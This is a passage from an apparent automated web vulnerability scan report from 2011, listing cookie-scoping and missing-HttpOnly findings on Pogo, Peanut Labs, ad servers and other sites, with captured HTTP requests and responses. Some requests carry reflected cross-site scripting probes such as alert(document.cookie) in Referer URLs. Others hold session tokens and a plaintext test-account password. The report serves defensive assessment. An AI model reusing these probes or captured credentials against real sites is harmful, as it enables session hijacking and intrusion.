GET /pl/profileSurveyRegister.php?cmd=PL_CMD_PROFILE_RESPONSE&cc=1&surveyId=1&version=2&&q1=qx1-2&dob3=1970%2F1%2F1&dob3_1=1970%2F1%2F1&q3=10010&q100=qx100-5&q101=qx101-0&q102=qx102-0&q103=qx103-0&q104=qx104-0&q105=2012%2F6%2F1&q105_1=2012%2F6%2F1&q130.0=qx130-2&q131.0=qx131-1&q131.1=qx131-7&q131.2=qx131-9&q131.3=qx131-10&q131.4=qx131-12&q131.5=qx131-13&q131.6=qx131-14&q131.7=qx131-15&q132.0=qx132-0&q132.1=qx132-1&q132.2=qx132-2&q132.3=qx132-3&q132.4=qx132-4&q132.5=qx132-6&q132.6=qx132-13&q133.0=qx133-0&q121=qx121-2&q122=qx122-0&q123.0=qx123-0&q123.1=qx123-1&q123.2=qx123-4&q123.3=qx123-7&q123.4=qx123-9&q123.5=qx123-10&q123.6=qx123-11&q124.0=qx124-0&q124.1=qx124-1&q124.2=qx124-2&q124.3=qx124-3&q124.4=qx124-4&q124.5=qx124-7&q124.6=qx124-8&q124.7=qx124-9&q124.8=qx124-10&q124.9=qx124-11&q124.10=qx124-12&q124.11=qx124-13&q125.0=qx125-0&q125.1=qx125-1&q125.2=qx125-2&q125.3=qx125-3&q126.0=qx126-3&q126.1=qx126-4&q126.2=qx126-5&q127=qx127-17&q128=qx128-4&q129.0=qx129-0&q129.1=qx129-1&q129.2=qx129-2&q129.3=qx129-3&q129.4=qx129-4&q129.5=qx129-5&q129.6=qx129-6&q129.7=qx129-7&q129.8=qx129-8&email=test4%40fastdial.net&complete=1&advertiserId=46&userId=998826224-3432-8939b981e2&offerInvitationId=&iframe_tag= HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:34:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; expires=Mon, 09-Jan-2012 01:34:41 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_profile=deleted; expires=Sat, 09-Jan-2010 01:34:40 GMT; path=/; domain=.peanutlabs.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 2467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

9.65. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/publisher/dashboard2/PublisherDashboard.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ext_cid=deleted; expires=Sat, 09-Jan-2010 01:35:39 GMT; path=/; domain=.peanutlabs.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /publisher/dashboard2/PublisherDashboard.php HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www1.peanutlabs.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:35:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ext_cid=deleted; expires=Sat, 09-Jan-2010 01:35:39 GMT; path=/; domain=.peanutlabs.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 2293

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Peanut Labs Media Publisher Dashboard</title>
<script src="AC_OETags.js" language="javascript"
...[SNIP]...

9.66. http://www.pogo.com/action/pogo/lightreg.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/lightreg.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; Domain=.pogo.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/pogo/lightreg.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/lightregview.do
Cache-Control: max-age=0
Origin: http://www.pogo.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B
Content-Length: 210

site=pogo&screenname=k7240&password=Dunno1&password_confirm=Dunno1&gender=F&birth_month=1&birth_day=1&birth_year=1970&country=US&email=test%40fastdial.net&lightreg_newword=0&wordverresponse=ckgwjx&acc
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.site=pogo; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:26:11 GMT; Path=/login
Set-Cookie: com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; Domain=.pogo.com; Path=/
Set-Cookie: com.pogo.tafrcode=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Location: http://www.pogo.com/login/pogo/setCookie.do
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:26:10 GMT
Server: Apache-Coyote/1.1

9.67. http://www.pogo.com/games/connect.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/games/connect.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

com.pogo.recent=scrabble.2player.social.17fbdp; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:34:04 GMT; Path=/games/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /games/connect.jsp?game=scrabble&apid=autoratedrules&auto=PlayNow&rule=2player&tab=beginner HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:34:04 GMT; Path=/games/
Location: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Content-Length: 0
Date: Sun, 09 Jan 2011 01:34:03 GMT
Server: Apache-Coyote/1.1

9.68. http://www.pogo.com/games/scrabble previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/games/scrabble

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:29:48 GMT; Path=/games/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B

Response

9.69. http://www.pogo.com/login/entry.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/login/entry.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

com.pogo.lkey=TRB7pR5lcxMFFwWzCn4zTAAAKME.; Domain=.pogo.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/entry.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.lkey=TRB7pR5lcxMFFwWzCn4zTAAAKME.; Domain=.pogo.com; Path=/
Location: http://www.pogo.com/
Content-Length: 0
Date: Sun, 09 Jan 2011 01:52:09 GMT
Server: Apache-Coyote/1.1

9.70. http://www.pogo.com/login/pogo/setCookie.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/login/pogo/setCookie.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:26:12 GMT; Path=/login

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/pogo/setCookie.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/lightregview.do
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:26:12 GMT; Path=/login
Location: http://www.pogo.com/action/pogo/confirmation.do
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:26:11 GMT
Server: Apache-Coyote/1.1

9.71. https://www.pogo.com/fbconnect/js.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/fbconnect/js.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

prod.JID=C0E6107E9294EBED951A4EC6E886F7B9.000257; Domain=.pogo.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fbconnect/js.do HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.unid=6606480040153856; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536962788-New%7C1297128962788%3B

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=C0E6107E9294EBED951A4EC6E886F7B9.000257; Domain=.pogo.com; Path=/
Content-Language: en-US
Location: https://www.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=https%3A%2F%2Fwww.pogo.com%2Ffbconnect%2Fjs.do
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:47:02 GMT
Server: Apache-Coyote/1.1

10. Cookie without HttpOnly flag set previous next
There are 97 instances of this issue:

http://ads.adxpose.com/ads/ads.js
http://diythemes.com/thesis/
http://event.adxpose.com/event.flow
http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
http://www.43things.com/person/
http://www.adbrite.com/mb/commerce/purchase_form.php
http://www.adobe.com/cfusion/exchange/
http://www.adobe.com/cfusion/marketplace/index.cfm
http://www.adobe.com/cfusion/membership/index.cfm
http://www.adobe.com/cfusion/membership/logout.cfm
http://www.adobe.com/cfusion/partnerportal/index.cfm
http://www.adobe.com/cfusion/showcase/index.cfm
http://www.adobe.com/cfusion/store/html/index.cfm
http://www.adobe.com/cfusion/support/index.cfm
http://www.adobe.com/events/main.jsp
http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-
http://www.peanutlabs.com/peanutlabs/
http://www.peanutlabs.com/userGreeting.php
http://www.pixeltrack66.com/mt/w2643334g4y223/
http://www.thedailynews.cc/
http://ad.doubleclick.net/click
http://ad.turn.com/server/pixel.htm
http://altfarm.mediaplex.com/ad/js/55290
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://board-games.pogo.com/
http://board-games.pogo.com/games/monopoly
http://board-games.pogo.com/games/online-chess
http://board-games.pogo.com/games/risk
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://card-games.pogo.com/
http://card-games.pogo.com/games/cribbage
http://card-games.pogo.com/games/rainy-day-spider-solitaire
http://click.linksynergy.com/fs-bin/stat
http://clubpogo-games.pogo.com/
http://flash-games.pogo.com/
http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js
http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js
http://puzzle-games.pogo.com/
http://puzzle-games.pogo.com/games/bejeweled2
http://puzzle-games.pogo.com/games/yahtzee-party
http://r.turn.com/server/pixel.htm
http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64
http://r1.ace.advertising.com/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1
http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble
http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F
http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1
http://www.bbc.co.uk/news/technology-12126880
http://www.e00.peanutlabs.com/IMG/parent_company.logo_url_medium.80x200.1.1248929690.jpg
http://www.e00.peanutlabs.com/favicon.ico
http://www.e00.peanutlabs.com/js/iFrame/index.php
http://www.e00.peanutlabs.com/js/images/languages/icon_world.png
http://www.e00.peanutlabs.com/recvMid.php
http://www.ea.com/
http://www.ea.com/hasbro
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.facebook.com/
http://www.facebook.com/2008/fbml
http://www.facebook.com/Pogo
http://www.facebook.com/event.php
http://www.facebook.com/logout.php
http://www.facebook.com/pages/Packet-Storm-Security/116613458352817
http://www.facebook.com/peanutlabs
http://www.facebook.com/sitetour/connect.php
https://www.facebook.com/login.php
http://www.gamespot.com/
http://www.intellicast.com/
http://www.intellicast.com/Local/Weather.aspx
http://www.intellicast.com/Travel/CheapFlightsWidget.htm
http://www.intellicast.com/favicon.ico
http://www.peanutlabs.com/core.php
http://www.peanutlabs.com/pl/profileSurveyRegister.php
http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php
http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409
http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409
http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4=
http://www.pogo.com/action/pogo/lightreg.do
http://www.pogo.com/games/connect.jsp
http://www.pogo.com/games/scrabble
http://www.pogo.com/login/entry.jsp
http://www.pogo.com/login/pogo/setCookie.do
https://www.pogo.com/fbconnect/js.do
http://www.rockband.com/
http://www.xanga.com/

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. http://ads.adxpose.com/ads/ads.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=C8DDA40C8F4C2B65082C50B995B886FC; Path=/
evlu=9f6f0757-8308-4d33-b185-c4e0ced3c79a; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:53 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.2. http://diythemes.com/thesis/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://diythemes.com
Path:	/thesis/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=131fd88d1012eb5a5b3d87a3d5024cda; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thesis/ HTTP/1.1
Host: diythemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.3. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=513148566CAD5DDB4E79FD10B3255E39; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow HTTP/1.1
Host: event.adxpose.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=050A46D4E4695FF1279B3090A4F21432; evlu=ddad3821-ec58-4641-be95-961ec5aac4d2;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=513148566CAD5DDB4E79FD10B3255E39; Path=/
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:14:29 GMT
Connection: close

10.4. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://online.wsj.com
Path:	/article/SB10001424052748704415104576066830729058232.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000
DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT
wsjregion=na%2cus; path=/; domain=.wsj.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.5. http://www.43things.com/person/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.43things.com
Path:	/person/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/
ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.6. http://www.adbrite.com/mb/commerce/purchase_form.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adbrite.com
Path:	/mb/commerce/purchase_form.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ADBRITE_SESS_1=20vl1tpukh23pji2agsn60lh44; expires=Mon, 17 Jan 2011 02:58:24 GMT; path=/; domain=www.adbrite.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mb/commerce/purchase_form.php HTTP/1.1
Host: www.adbrite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
